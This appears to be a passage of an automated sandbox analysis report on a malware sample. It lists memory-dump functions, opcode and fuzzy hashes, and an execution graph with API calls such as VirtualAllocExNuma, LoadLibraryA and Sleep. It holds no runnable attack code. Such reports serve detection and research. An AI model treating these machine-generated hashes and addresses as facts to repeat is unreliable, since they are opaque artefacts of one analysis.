                                                    • Opcode ID: aedb090caad23710ff5575ef01aa1127d293ef2aced05159573f2b6e0111d600
                                                    • Instruction ID: f2598a45ceb357c16830d772c26bb89869d5a9e22860777cf2da1a80902a2013
                                                    • Opcode Fuzzy Hash: aedb090caad23710ff5575ef01aa1127d293ef2aced05159573f2b6e0111d600
                                                    • Instruction Fuzzy Hash: AD2125B1508240DFDB05CF14DDC0BA6BF66FB98368F24856DE9066B216C336D885CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E2D1D4 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317449566.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e2d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c942e6f6f29cda583e08700ab4fe13ab0d5bcb7a635c09492180e386c4958ee5
                                                    • Instruction ID: 7777118769c537c9d19d492ebd306cf3ba8facc805f22e18675cec42ad50e85b
                                                    • Opcode Fuzzy Hash: c942e6f6f29cda583e08700ab4fe13ab0d5bcb7a635c09492180e386c4958ee5
                                                    • Instruction Fuzzy Hash: 482107B2508244EFDB05CF50E9C4B26BB65FB84318F24C56DEA09AB266C336D846CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E2D01C Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317449566.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e2d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d1ea656592c8490535b5db0376da9bf07fc0198240307930f5e1adb0b3ed4b4
                                                    • Instruction ID: 14316e521bcb66fa417d70e9ace91c46821865bbb1aca8d871dc5fd8b1060fe8
                                                    • Opcode Fuzzy Hash: 7d1ea656592c8490535b5db0376da9bf07fc0198240307930f5e1adb0b3ed4b4
                                                    • Instruction Fuzzy Hash: 2821F571508244DFDB14CF10E9C4F26BB66FB84318F24C56DEA4A5B266C736D846CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E2D005 Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317449566.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e2d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 99bf322606dd8202beed9efdd3208538a9d1f809cbce580e120c0ee7bd53a097
                                                    • Instruction ID: 915da7a34b414e78fc3b802f7642b3e219f995022c8d90223409467bb203f6a3
                                                    • Opcode Fuzzy Hash: 99bf322606dd8202beed9efdd3208538a9d1f809cbce580e120c0ee7bd53a097
                                                    • Instruction Fuzzy Hash: D721957550D3C08FCB12CF24D990B15BF71EB46314F29C5DAD9498B667C33A980ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E1D49B Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317408506.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e1d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f21b28fad4208f8a7773c4da12b744b29c369e0cd12ff14c60c0cef6af4301ee
                                                    • Instruction ID: 4cbe1e8ab5fa9c410d42e77f7c9382c60f371f6155aed0ff693f125ddf39c3b5
                                                    • Opcode Fuzzy Hash: f21b28fad4208f8a7773c4da12b744b29c369e0cd12ff14c60c0cef6af4301ee
                                                    • Instruction Fuzzy Hash: 3E11B4B6404280DFCB16CF14D9C4B56BF72FB94328F24C6A9D9055B616C336D856CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E2D1CF Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317449566.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e2d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fe9a0dd81ef1aaa8884096262e193c6d7ada8b10660d0bdcffad81c4736878b9
                                                    • Instruction ID: 95e7badbc9aa71fb6cb4ae5e47b045b6c633b91a29a8aec25f612df759598c07
                                                    • Opcode Fuzzy Hash: fe9a0dd81ef1aaa8884096262e193c6d7ada8b10660d0bdcffad81c4736878b9
                                                    • Instruction Fuzzy Hash: E611DD76908284DFCB01CF10D9C0B15FBB1FB84328F28C6ADD9495B666C33AD85ACB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E1D745 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317408506.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e1d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d533d3c63e14080a9ee56050eaab029bf9cf5cb948056101ffdf6e0c5fd46847
                                                    • Instruction ID: 7a6c2c14ff1b9466f9970565f590dc95b5d4215fae6e47f1825f31fe051f0476
                                                    • Opcode Fuzzy Hash: d533d3c63e14080a9ee56050eaab029bf9cf5cb948056101ffdf6e0c5fd46847
                                                    • Instruction Fuzzy Hash: 8C01DF7100C3809AE7108A26CC84BE6BB98EF41378F18851FEA056A286D3799C80CAB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00E1D744 Relevance: .0, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317408506.0000000000E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E1D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_e1d000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a0e3fa4eadf754c6b6388876ef5468c95803f64ca59d21e92031836b345d487
                                                    • Instruction ID: a3db68d5d7c6a1fe7d0010af52150c6f76903ad8452b4883638ee946e8e5d307
                                                    • Opcode Fuzzy Hash: 2a0e3fa4eadf754c6b6388876ef5468c95803f64ca59d21e92031836b345d487
                                                    • Instruction Fuzzy Hash: 16F062714083849AE7148E16CC84BA3FF9CEB91778F18C45BFD086B286C3799C84CAB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 029EE918 Relevance: .3, Instructions: 315COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ab653ad1152e71ac85f08be9cfc941216f9d6fa16755142083f440b9a47c019
                                                    • Instruction ID: 763e6442aedfc2c6c95a6a896dde6bae9dae8e68cec27f6da71b39d9cd62bd0c
                                                    • Opcode Fuzzy Hash: 0ab653ad1152e71ac85f08be9cfc941216f9d6fa16755142083f440b9a47c019
                                                    • Instruction Fuzzy Hash: 8112D5F1511746AAE730CF65F99E1DD3BA0B745328B90E209D2612FAE8D7B8114ACF84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029EC624 Relevance: .3, Instructions: 265COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 38b66757baa0bc1bb8ef40d7aab6618a3353c296640b8c881c4f896d930372f5
                                                    • Instruction ID: c30df246c7670a33045c0d09e4a9c747f2fbe7adeaba99baf56d9353b13f7c43
                                                    • Opcode Fuzzy Hash: 38b66757baa0bc1bb8ef40d7aab6618a3353c296640b8c881c4f896d930372f5
                                                    • Instruction Fuzzy Hash: FAA17F32E0021ADFCF16DFA5C8445DEBBB6FF85300B15856AE816AB220EB71A945CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029EE908 Relevance: .2, Instructions: 223COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.317899710.00000000029E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_29e0000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 42d97e36ed9b127704bec646315634b18218297cdab7b01945f0c0a629260f91
                                                    • Instruction ID: 01345f119c60529885aa016edc32283d59f5d8a9a58ee08ec6c5970ff692c6ad
                                                    • Opcode Fuzzy Hash: 42d97e36ed9b127704bec646315634b18218297cdab7b01945f0c0a629260f91
                                                    • Instruction Fuzzy Hash: 2CC136B1911746AAD730DF65F88E1DD3BB1BB85328F50E209D1616BAD8DBB8104ACF84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:11%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:4.8%
                                                    Total number of Nodes:62
                                                    Total number of Limit Nodes:1
                                                    execution_graph 19312 2c54d50 19313 2c54d64 19312->19313 19316 2c553a2 19313->19316 19314 2c54d6d 19317 2c553ab 19316->19317 19322 2c55584 19316->19322 19327 2c55488 19316->19327 19332 2c55479 19316->19332 19337 2c5559e 19316->19337 19317->19314 19323 2c55537 19322->19323 19324 2c555c3 19323->19324 19342 2c55890 19323->19342 19347 2c5587f 19323->19347 19328 2c554cc 19327->19328 19329 2c555c3 19328->19329 19330 2c55890 2 API calls 19328->19330 19331 2c5587f 2 API calls 19328->19331 19330->19329 19331->19329 19333 2c55488 19332->19333 19334 2c555c3 19333->19334 19335 2c55890 2 API calls 19333->19335 19336 2c5587f 2 API calls 19333->19336 19335->19334 19336->19334 19338 2c555b1 19337->19338 19339 2c555c3 19337->19339 19340 2c55890 2 API calls 19338->19340 19341 2c5587f 2 API calls 19338->19341 19339->19339 19340->19339 19341->19339 19343 2c5589e 19342->19343 19352 2c558e0 19343->19352 19356 2c558cf 19343->19356 19344 2c558ae 19344->19324 19348 2c5589e 19347->19348 19350 2c558e0 RtlEncodePointer 19348->19350 19351 2c558cf RtlEncodePointer 19348->19351 19349 2c558ae 19349->19324 19350->19349 19351->19349 19353 2c5591a 19352->19353 19354 2c55944 RtlEncodePointer 19353->19354 19355 2c5596d 19353->19355 19354->19355 19355->19344 19357 2c558de 19356->19357 19358 2c55944 RtlEncodePointer 19357->19358 19359 2c5596d 19357->19359 19358->19359 19359->19344 19360 6925d08 19361 6925d27 LdrInitializeThunk 19360->19361 19363 6925d7a 19361->19363 19292 2c50448 19293 2c50455 19292->19293 19296 2c50878 19293->19296 19294 2c5045b 19299 2c50893 19296->19299 19298 2c509c7 19298->19294 19299->19298 19301 2c50a53 VirtualAllocExNuma 19299->19301 19304 2c5042c 19299->19304 19308 2c50554 19299->19308 19303 2c50b1b 19301->19303 19303->19294 19305 2c50b58 Sleep 19304->19305 19307 2c50bcc 19305->19307 19307->19299 19309 2c50a98 VirtualAllocExNuma 19308->19309 19311 2c50b1b 19309->19311 19311->19299 19364 2c5bcb8 19365 2c5bcd6 19364->19365 19368 2c5b894 19365->19368 19367 2c5bd0d 19370 2c5d7d8 LoadLibraryA 19368->19370 19371 2c5d8ba 19370->19371

                                                    Executed Functions

                                                    Function 06925D08 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 438 6925d08-6925d74 LdrInitializeThunk 446 6925d7a-6925d94 438->446 447 6925ebd-6925eda 438->447 446->447 450 6925d9a-6925db4 446->450 459 6925edf-6925ee8 447->459 453 6925db6-6925db8 450->453 454 6925dba 450->454 456 6925dbd-6925e18 453->456 454->456 465 6925e1a-6925e1c 456->465 466 6925e1e 456->466 467 6925e21-6925ebb 465->467 466->467 467->459
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.555727701.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_6920000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 23c4bfe43a4371d29d87a462c7819442ced9c6304459cb18e952724800404dc8
                                                    • Instruction ID: 98349b58ef31496829c03452e06253d20c01ea4876930ef66e77d203daf4a4a6
                                                    • Opcode Fuzzy Hash: 23c4bfe43a4371d29d87a462c7819442ced9c6304459cb18e952724800404dc8
                                                    • Instruction Fuzzy Hash: 54519431B002059FCB04EFB0D888AAEB7B6BF84304F148929E512EB355EF30DD448BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02C50878 Relevance: 1.8, APIs: 1, Instructions: 254memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 374 2c50878-2c50891 375 2c50893-2c50896 374->375 376 2c508d9-2c508dc 375->376 377 2c50898-2c508c8 375->377 378 2c508e3-2c508e6 376->378 379 2c508de 376->379 380 2c50a2e call 2c50be8 377->380 381 2c508ce 377->381 382 2c508f4-2c508f7 378->382 383 2c508e8-2c508ea call 2c5042c 378->383 379->378 386 2c50a34 380->386 381->380 384 2c508d4 381->384 387 2c50906-2c50909 382->387 388 2c508f9 382->388 389 2c508ef 383->389 384->376 390 2c50a39-2c50a3b 386->390 391 2c50916-2c50919 387->391 392 2c5090b 387->392 395 2c50901 388->395 389->382 393 2c50a42-2c50a45 390->393 394 2c50a3d 390->394 396 2c5091b-2c5091f 391->396 397 2c5092a-2c5092d 391->397 401 2c50911 392->401 393->375 400 2c50a4b-2c50a52 393->400 394->393 395->387 402 2c50925 396->402 403 2c509d4-2c509f0 396->403 398 2c5095c-2c5095f 397->398 399 2c5092f-2c5094f call 2c50554 397->399 404 2c50961 398->404 405 2c5096c-2c5096f 398->405 422 2c50954-2c50957 399->422 401->391 402->397 413 2c509f5-2c509f8 403->413 435 2c50961 call 2c528c4 404->435 436 2c50961 call 2c527d8 404->436 408 2c50971-2c509bd 405->408 409 2c509c2-2c509c5 405->409 408->409 410 2c509c7-2c509ce 409->410 411 2c509cf-2c509d2 409->411 411->403 411->413 412 2c50967 412->405 418 2c50a1c-2c50a1f 413->418 419 2c509fa-2c50a13 413->419 420 2c50a21-2c50a28 418->420 421 2c50a29-2c50a2c 418->421 425 2c50a15-2c50a17 419->425 426 2c50a53-2c50a7a 419->426 421->380 421->390 422->398 425->418 428 2c50ac0-2c50b19 VirtualAllocExNuma 426->428 429 2c50a7c-2c50abf 426->429 431 2c50b22-2c50b3f 428->431 432 2c50b1b-2c50b21 428->432 429->428 432->431 435->412 436->412
                                                    APIs
                                                    • VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 02C50B06
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocNumaVirtual
                                                    • String ID:
                                                    • API String ID: 4233825816-0
                                                    • Opcode ID: 85fec9a2281ca34ca61bf20ebb8a944890ad0d8b8a73bc795161dd92f98db6f1
                                                    • Instruction ID: d44d4b7c18e242c885668159d9a25246b71d01a180f3c661167f64f617eed687
                                                    • Opcode Fuzzy Hash: 85fec9a2281ca34ca61bf20ebb8a944890ad0d8b8a73bc795161dd92f98db6f1
                                                    • Instruction Fuzzy Hash: C481BF71E002188FDF20CBA9D8847ADBBB1EF8D324F20456AE909E7291D734DD95CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02C5D7CC Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 503 2c5d7cc-2c5d82f 504 2c5d831-2c5d83b 503->504 505 2c5d868-2c5d8b8 LoadLibraryA 503->505 504->505 506 2c5d83d-2c5d83f 504->506 510 2c5d8c1-2c5d8f2 505->510 511 2c5d8ba-2c5d8c0 505->511 508 2c5d841-2c5d84b 506->508 509 2c5d862-2c5d865 506->509 512 2c5d84d 508->512 513 2c5d84f-2c5d85e 508->513 509->505 517 2c5d8f4-2c5d8f8 510->517 518 2c5d902 510->518 511->510 512->513 513->513 515 2c5d860 513->515 515->509 517->518 519 2c5d8fa 517->519 520 2c5d903 518->520 519->518 520->520
                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(?), ref: 02C5D8A2
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: a5bda58d2e3e39e50b42ec9fa2cd3d6da24fbfc18d6a77fd738893d8852bb783
                                                    • Instruction ID: 4406003f61da667abca80ceb411b561068cbbfc693d56d78408d7f642581d3d7
                                                    • Opcode Fuzzy Hash: a5bda58d2e3e39e50b42ec9fa2cd3d6da24fbfc18d6a77fd738893d8852bb783
                                                    • Instruction Fuzzy Hash: 414122B0D003198FDB14CFA9D88579DBBB1FF48714F148129E816A7380D7789885CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02C5B894 Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 484 2c5b894-2c5d82f 486 2c5d831-2c5d83b 484->486 487 2c5d868-2c5d8b8 LoadLibraryA 484->487 486->487 488 2c5d83d-2c5d83f 486->488 492 2c5d8c1-2c5d8f2 487->492 493 2c5d8ba-2c5d8c0 487->493 490 2c5d841-2c5d84b 488->490 491 2c5d862-2c5d865 488->491 494 2c5d84d 490->494 495 2c5d84f-2c5d85e 490->495 491->487 499 2c5d8f4-2c5d8f8 492->499 500 2c5d902 492->500 493->492 494->495 495->495 497 2c5d860 495->497 497->491 499->500 501 2c5d8fa 499->501 502 2c5d903 500->502 501->500 502->502
                                                    APIs
                                                    • LoadLibraryA.KERNELBASE(?), ref: 02C5D8A2
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 756a286c27e7b05dae97af9bfad2bf6c10e509e8fa2ca98f6a5fc37e9f26bec2
                                                    • Instruction ID: d747fd4764ab443f133a344f76bf2a94fdaef6c9169021af975bc77975628104
                                                    • Opcode Fuzzy Hash: 756a286c27e7b05dae97af9bfad2bf6c10e509e8fa2ca98f6a5fc37e9f26bec2
                                                    • Instruction Fuzzy Hash: 1D3104B0D103598FDB14CF99D885B9EBBB1FF48714F148129E816AB380D7789485CF96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02C50A83 Relevance: 1.6, APIs: 1, Instructions: 64memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1140 2c50a83-2c50ad3 1141 2c50adb-2c50b19 VirtualAllocExNuma 1140->1141 1142 2c50b22-2c50b3f 1141->1142 1143 2c50b1b-2c50b21 1141->1143 1143->1142
                                                    APIs
                                                    • VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 02C50B06
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocNumaVirtual
                                                    • String ID:
                                                    • API String ID: 4233825816-0
                                                    • Opcode ID: 1edd8cc5b0f45b274a4ce55964aff5d031ae7916c00754dccc44780661ae7502
                                                    • Instruction ID: 7fb01b0338d448c55a0fa3a51ebaa219cb9bfa56bae627500b04feefd2788eaf
                                                    • Opcode Fuzzy Hash: 1edd8cc5b0f45b274a4ce55964aff5d031ae7916c00754dccc44780661ae7502
                                                    • Instruction Fuzzy Hash: 592177B19002499FCF10CFAAC884ADEBFF4EF88324F148459E959A7210D375A945CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02C558CF Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1146 2c558cf-2c558dc 1147 2c558f5-2c55922 1146->1147 1148 2c558de-2c558f0 1146->1148 1151 2c55924-2c55926 1147->1151 1152 2c55928 1147->1152 1148->1147 1153 2c5592d-2c55938 1151->1153 1152->1153 1154 2c55999-2c559a6 1153->1154 1155 2c5593a-2c5596b RtlEncodePointer 1153->1155 1157 2c55974-2c55994 1155->1157 1158 2c5596d-2c55973 1155->1158 1157->1154 1158->1157
                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000), ref: 02C5595A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID:
                                                    • API String ID: 2118026453-0
                                                    • Opcode ID: 5982481d91bb4892dc5a97826ae5af5eb381026f6c175ba5f4f63efa19adc8e2
                                                    • Instruction ID: 584f6e062726e59e8b38f619025c0927d765dba376258d78b12bd16b5fa8e387
                                                    • Opcode Fuzzy Hash: 5982481d91bb4892dc5a97826ae5af5eb381026f6c175ba5f4f63efa19adc8e2
                                                    • Instruction Fuzzy Hash: 3121D0B1800348CFCB00CFA6C4483AABBF0EB45328F28802AC945E7641D7399545CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02C50554 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1160 2c50554-2c50b19 VirtualAllocExNuma 1163 2c50b22-2c50b3f 1160->1163 1164 2c50b1b-2c50b21 1160->1164 1164->1163
                                                    APIs
                                                    • VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 02C50B06
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocNumaVirtual
                                                    • String ID:
                                                    • API String ID: 4233825816-0
                                                    • Opcode ID: 0c1fd91c9aa1054e301dc7e30be15a69422ff42693027c8c49614d9f72bae12c
                                                    • Instruction ID: 37bf24f9e5f812a0df9cd29b061eb3620fa8706cf3a93c4bee79632aae2fbf05
                                                    • Opcode Fuzzy Hash: 0c1fd91c9aa1054e301dc7e30be15a69422ff42693027c8c49614d9f72bae12c
                                                    • Instruction Fuzzy Hash: 422133B19002099FCF10CF9AC888BDEBBF4EB88324F108419E929A7210D775A954CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02C558E0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1167 2c558e0-2c55922 1170 2c55924-2c55926 1167->1170 1171 2c55928 1167->1171 1172 2c5592d-2c55938 1170->1172 1171->1172 1173 2c55999-2c559a6 1172->1173 1174 2c5593a-2c5596b RtlEncodePointer 1172->1174 1176 2c55974-2c55994 1174->1176 1177 2c5596d-2c55973 1174->1177 1176->1173 1177->1176
                                                    APIs
                                                    • RtlEncodePointer.NTDLL(00000000), ref: 02C5595A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID:
                                                    • API String ID: 2118026453-0
                                                    • Opcode ID: f74262cc55659184f8e8c2ae477678121f53babaef262d15f1855f0bad82eb32
                                                    • Instruction ID: d39cd513b2bf35fe43b744b051defbff030a0747f379b9742130cab45fb037e3
                                                    • Opcode Fuzzy Hash: f74262cc55659184f8e8c2ae477678121f53babaef262d15f1855f0bad82eb32
                                                    • Instruction Fuzzy Hash: F811DFB1900349CFCB10DFAAD4487AEBBF4EB44324F24802AD905A7240C739A945CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02C5042C Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2325 2c5042c-2c50bca Sleep 2328 2c50bd1-2c50be5 2325->2328 2329 2c50bcc 2325->2329 2329->2328
                                                    APIs
                                                    • Sleep.KERNELBASE(00000000), ref: 02C50BB7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 2c05f4b1c779831a5e4127637e5dcce56458fd91b8eaf4818db1e8c477a85c0d
                                                    • Instruction ID: bfd557a99035397f3704a93fe4cf68914d755505f4265718c023e640be5829ad
                                                    • Opcode Fuzzy Hash: 2c05f4b1c779831a5e4127637e5dcce56458fd91b8eaf4818db1e8c477a85c0d
                                                    • Instruction Fuzzy Hash: 081102B1900609CFCB10CF8AC484B9EBBF4EB88328F148459D919A7240D775A945CFA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02C50B52 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNELBASE(00000000), ref: 02C50BB7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.530464626.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_2c50000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 1113b0d8f2db3f067808a84c1123674fdc1b1665e92201f92d2459fff9828a31
                                                    • Instruction ID: 21be6b57843a91a7d428738f71796b5fb588f167b9ac08e6bf24b4032607febe
                                                    • Opcode Fuzzy Hash: 1113b0d8f2db3f067808a84c1123674fdc1b1665e92201f92d2459fff9828a31
                                                    • Instruction Fuzzy Hash: 6411EDB5900209CFCB10CF9AD585BEEBBF4EB88328F14845AD969A7340D774A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%